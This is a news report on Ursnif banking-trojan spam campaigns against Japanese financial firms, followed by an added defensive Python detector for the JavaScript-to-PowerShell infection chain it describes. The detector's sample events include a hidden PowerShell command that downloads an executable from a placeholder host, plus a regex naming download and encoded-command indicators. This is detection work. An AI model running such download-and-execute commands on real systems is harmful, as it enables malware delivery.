Malspam campaigns designed to spread the Ursnif banking trojan have been heavily targeting Japanese banks and payment card providers in 2017, especially since September, according to IBM's X-Force research team.
These attacks have been leveraging Ursnif, also known as Gozi, to steal data from secure sessions, perform web injections and execute page redirections, reports Limor Kessem, IBM cybersecurity expert, in a company blog post on Thursday. The malware targets not only banking credentials, but also local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, the report continues.
Because the targets in each successive attack have been the same, IBM posits that one threat actor is responsible for all of the spam campaigns, most of which infect victims with fake attachments designed to impersonate Japanese financial services and payment card providers.
"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem writes. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains."
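The infection chain quoted above (a Windows script host running the JavaScript, which launches PowerShell to fetch a payload) is a parent/child process pattern a defender can hunt for in endpoint telemetry. The following is an added example, not code from the original article or from IBM's report; the events are constructed Sysmon-style process-creation records, and the fetch/encoding indicators are a heuristic assumption rather than anything the report lists.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 shape); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WScript.exe",
     "cmd": r'WScript.exe "C:\Users\u\Downloads\invoice_0917.zip\invoice.js"'},
    {"id": 2, "parent": r"C:\Windows\System32\WScript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -c (New-Object Net.WebClient)"
            ".DownloadFile('http://example.invalid/p','%TEMP%\\p.exe')"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-ChildItem C:\\Logs"},  # benign admin use, must not fire
    {"id": 4, "parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -enc SQBFAFgA..."},  # placeholder encoded command
]

# Script hosts that run a .js dropped from an archive (assumption: wscript/cscript).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Heuristic indicators that a PowerShell command line fetches remote content or
# hides its body behind an encoded command. Assumption, not from the report.
FETCH_PATTERNS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|\biwr\b"
    r"|\bcurl\b|\bwget\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_script_host_to_powershell_fetch(event):
    """True when a script host spawned PowerShell with a fetch/encoded command line."""
    return (
        basename(event["parent"]) in SCRIPT_HOSTS
        and basename(event["image"]) == "powershell.exe"
        and FETCH_PATTERNS.search(event["cmd"]) is not None
    )


def flagged_ids(events):
    """Return the ids of events matching the script-host -> PowerShell fetch chain."""
    return [e["id"] for e in events if is_script_host_to_powershell_fetch(e)]
```

Running `flagged_ids(SAMPLE_EVENTS)` flags events 2 and 4 and leaves the direct `explorer.exe` launches alone; in production the same rule would be expressed as a SIEM/EDR query over the parent image, image and command-line fields.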